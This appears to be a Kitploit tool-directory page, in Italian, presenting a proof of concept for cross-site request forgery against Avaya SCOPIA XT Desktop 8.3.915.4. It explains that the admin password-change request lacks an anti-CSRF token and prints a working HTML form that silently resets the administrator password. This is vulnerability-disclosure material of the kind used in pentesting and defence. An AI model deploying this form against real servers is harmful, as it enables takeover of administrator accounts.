Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4 — Prova di concetto che dimostra Cross-Site Request Forgery (CSRF) su Avaya SCOPIA XT Desktop, che consente di modificare la password dell'amministratore senza token anti-CSRF. | Kitploit
Strumenti/GitHubGitHub/v1n1v131r4/exploit-csrf-on-scopia-xt-desktop-version-8.3.915.4
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubv1n1v131r4/exploit-csrf-on-scopia-xt-desktop-version-8.3.915.4

Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4

Prova di concetto che dimostra Cross-Site Request Forgery (CSRF) su Avaya SCOPIA XT Desktop, che consente di modificare la password dell'amministratore senza token anti-CSRF.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
15 anni faNon ancora revisionato

Exploit CSRF su SCOPIA XT Desktop versione 8.3.915.4

Questo PoC descriverà come sfruttare la Cross-Site Request Forgery (CSRF) su SCOPIA XT Desktop versione 8.3.915.4


Informazioni su SCOPIA

sito web: https://support.avaya.com/products/P1421/scopia-desktop/8.2.1


Informazioni sulla Cross-Site Request Forgery (CSRF)

La cross-site request forgery, nota anche come attacco one-click o session riding e abbreviata come CSRF o XSRF, è un tipo di exploit dannoso di un sito web in cui comandi non autorizzati vengono trasmessi da un utente di cui l'applicazione web si fida.


Proof of Concept - modifica della password di amministratore

1

Nella pagina "Directory and Authentication", l'amministratore è in grado di cambiare la propria password.

2

Catturando la richiesta con Burp Suite ho potuto notare che un token anti-csrf non era implementato e l'unico meccanismo di sicurezza è il cookie di sessione.

6

Ho creato questo file html che è servito come PoC per sfruttare la vulnerabilità presentata.

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
	<form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
		<input type="text" name="JSESSIONID" value="">
		<input type="text" name="newadminusername" value="">
		<input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
		<input type="text" name="newenablext1000meetingpin" value="false">
		<input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
		<input type="text" name="checkstatus" value="true">
		<input type="submit" value="Send">
	</form>
</body>
</html>

Eseguendolo nel browser che ha un cookie valido per l'ambiente di amministrazione di SCOPIA XT Desktop, è stato possibile cambiare la password dell'utente admin in "attacker":

4

5

Scarica lo strumento